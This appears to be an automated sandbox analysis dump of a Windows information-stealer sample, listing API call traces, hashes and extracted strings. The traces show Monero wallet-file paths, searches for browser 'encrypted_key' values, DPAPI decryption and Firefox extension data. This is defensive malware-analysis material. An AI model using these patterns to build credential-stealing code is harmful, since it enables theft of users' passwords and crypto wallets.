                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 35dd85a3711a727317c8ab4dbe1b52bfd26e748ccc08b39d61995c73891820d4
                                  • Instruction ID: bfa5b64167677df8a73c21cb6c4d8f8b452ff702b0b4cf18f5534ab60a348b7e
                                  • Opcode Fuzzy Hash: 35dd85a3711a727317c8ab4dbe1b52bfd26e748ccc08b39d61995c73891820d4
                                  • Instruction Fuzzy Hash: EB81F771910128EBDB05FBA4EC5ADEE7378FF14300F504529F507A6091EF386A49DB66
                                  APIs
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                    • Part of subcall function 007199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007199EC
                                    • Part of subcall function 007199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00719A11
                                    • Part of subcall function 007199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00719A31
                                    • Part of subcall function 007199C0: ReadFile.KERNEL32(000000FF,?,00000000,0071148F,00000000), ref: 00719A5A
                                    • Part of subcall function 007199C0: LocalFree.KERNEL32(0071148F), ref: 00719A90
                                    • Part of subcall function 007199C0: CloseHandle.KERNEL32(000000FF), ref: 00719A9A
                                    • Part of subcall function 00728E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00728E52
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00731580,00730D92), ref: 0071F54C
                                  • lstrlen.KERNEL32(00000000), ref: 0071F56B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 998311485-3310892237
                                  • Opcode ID: 4dbe0ded40edeeb6b0882fe312416705f8cb28b08f6cc30c57b70d006bc172c9
                                  • Instruction ID: 662a9754a673dc071c3060f896f165c9338bf157a9670d0c66066cd439626c1d
                                  • Opcode Fuzzy Hash: 4dbe0ded40edeeb6b0882fe312416705f8cb28b08f6cc30c57b70d006bc172c9
                                  • Instruction Fuzzy Hash: 4551F171D10118FBDB04FBA4EC9ADED7378EF54300F408528F91667192EE386A49CBA6
                                  Strings
                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0072718C
                                  • sr, xrefs: 007272AE, 00727179, 0072717C
                                  • sr, xrefs: 00727111
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID: sr$sr$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                  • API String ID: 3722407311-1245071467
                                  • Opcode ID: 0f0c76fb2129cf2e039b2d2d2c3a52174c7fe812c4630193ad7c96603a166c93
                                  • Instruction ID: f13db904bf06814cd41edb9757b4b9572b4519b185787657262b9604015ced94
                                  • Opcode Fuzzy Hash: 0f0c76fb2129cf2e039b2d2d2c3a52174c7fe812c4630193ad7c96603a166c93
                                  • Instruction Fuzzy Hash: 535166B1D0422CEBDB18EB90ED95BEDB3B4AF54304F1041A9E21577182EB786E88CF55
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: d5ecd625161af27c08434c0ee3bbf556287401f8e0ed58c9dc1f414ba370e230
                                  • Instruction ID: 5ab34934dd4beef911c6b915124c5bfcae17256a1bd8f1e2fbb7d1623aaf347d
                                  • Opcode Fuzzy Hash: d5ecd625161af27c08434c0ee3bbf556287401f8e0ed58c9dc1f414ba370e230
                                  • Instruction Fuzzy Hash: 83418FB1D10219EFDB04EFE5E859AEEB778AF44304F008418E51677291DB3CAA05CFA6
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 007199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007199EC
                                    • Part of subcall function 007199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00719A11
                                    • Part of subcall function 007199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00719A31
                                    • Part of subcall function 007199C0: ReadFile.KERNEL32(000000FF,?,00000000,0071148F,00000000), ref: 00719A5A
                                    • Part of subcall function 007199C0: LocalFree.KERNEL32(0071148F), ref: 00719A90
                                    • Part of subcall function 007199C0: CloseHandle.KERNEL32(000000FF), ref: 00719A9A
                                    • Part of subcall function 00728E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00728E52
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00719D39
                                    • Part of subcall function 00719AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nq,00000000,00000000), ref: 00719AEF
                                    • Part of subcall function 00719AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00714EEE,00000000,?), ref: 00719B01
                                    • Part of subcall function 00719AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nq,00000000,00000000), ref: 00719B2A
                                    • Part of subcall function 00719AC0: LocalFree.KERNEL32(?,?,?,?,00714EEE,00000000,?), ref: 00719B3F
                                    • Part of subcall function 00719B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00719B84
                                    • Part of subcall function 00719B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00719BA3
                                    • Part of subcall function 00719B60: LocalFree.KERNEL32(?), ref: 00719BD3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2100535398-738592651
                                  • Opcode ID: 2098a98c9950228068d683a9efceb85570f3e18d1b43d6ab01bf908facdfd317
                                  • Instruction ID: 66e80c1da6874ed784f5b15596c83480dedab02a7801743b05b518464cb5f67b
                                  • Opcode Fuzzy Hash: 2098a98c9950228068d683a9efceb85570f3e18d1b43d6ab01bf908facdfd317
                                  • Instruction Fuzzy Hash: DA3132B5E10109ABDB04DFE8DC95AEFB7B8BF48304F544518EA05B7281E7389A45CBA1
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,007305B7), ref: 007286CA
                                  • Process32First.KERNEL32(?,00000128), ref: 007286DE
                                  • Process32Next.KERNEL32(?,00000128), ref: 007286F3
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                  • CloseHandle.KERNEL32(?), ref: 00728761
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: 76bd1784acd5063514adbd9f302e4d983c8702a7eab5f0f0f958e7690d75ca16
                                  • Instruction ID: fc929db1f5b754dd0e5c2d8c37841822eb437a6c583968238d906f48844cbb61
                                  • Opcode Fuzzy Hash: 76bd1784acd5063514adbd9f302e4d983c8702a7eab5f0f0f958e7690d75ca16
                                  • Instruction Fuzzy Hash: 6C316F71901228EBCB25DF51EC45FEEB778FF48700F104299E509A22A0DB386A45CFA2
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00730E00,00000000,?), ref: 007279B0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007279B7
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00730E00,00000000,?), ref: 007279C4
                                  • wsprintfA.USER32 ref: 007279F3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: bb2e4b65642240157e7e0557eed082f7e7e686097026ccd96407824e86cc5d48
                                  • Instruction ID: db6263fa04fc970693c41e81aa0e0e9b38a9e5a1ab24103b91cdd366593f8520
                                  • Opcode Fuzzy Hash: bb2e4b65642240157e7e0557eed082f7e7e686097026ccd96407824e86cc5d48
                                  • Instruction Fuzzy Hash: 5C1130B2918218ABCB14DFCADD45BBEB7F8FB4CB12F10421AF605A2280D3395940D775
                                  APIs
                                  • __getptd.LIBCMT ref: 0072C74E
                                    • Part of subcall function 0072BF9F: __amsg_exit.LIBCMT ref: 0072BFAF
                                  • __getptd.LIBCMT ref: 0072C765
                                  • __amsg_exit.LIBCMT ref: 0072C773
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0072C797
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  APIs
                                    • Part of subcall function 00728DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00728E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00724F7A
                                  • lstrcat.KERNEL32(?,00731070), ref: 00724F97
                                  • lstrcat.KERNEL32(?,01229D00), ref: 00724FAB
                                  • lstrcat.KERNEL32(?,00731074), ref: 00724FBD
                                    • Part of subcall function 00724910: wsprintfA.USER32 ref: 0072492C
                                    • Part of subcall function 00724910: FindFirstFileA.KERNEL32(?,?), ref: 00724943
                                    • Part of subcall function 00724910: StrCmpCA.SHLWAPI(?,00730FDC), ref: 00724971
                                    • Part of subcall function 00724910: StrCmpCA.SHLWAPI(?,00730FE0), ref: 00724987
                                    • Part of subcall function 00724910: FindNextFileA.KERNEL32(000000FF,?), ref: 00724B7D
                                    • Part of subcall function 00724910: FindClose.KERNEL32(000000FF), ref: 00724B92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0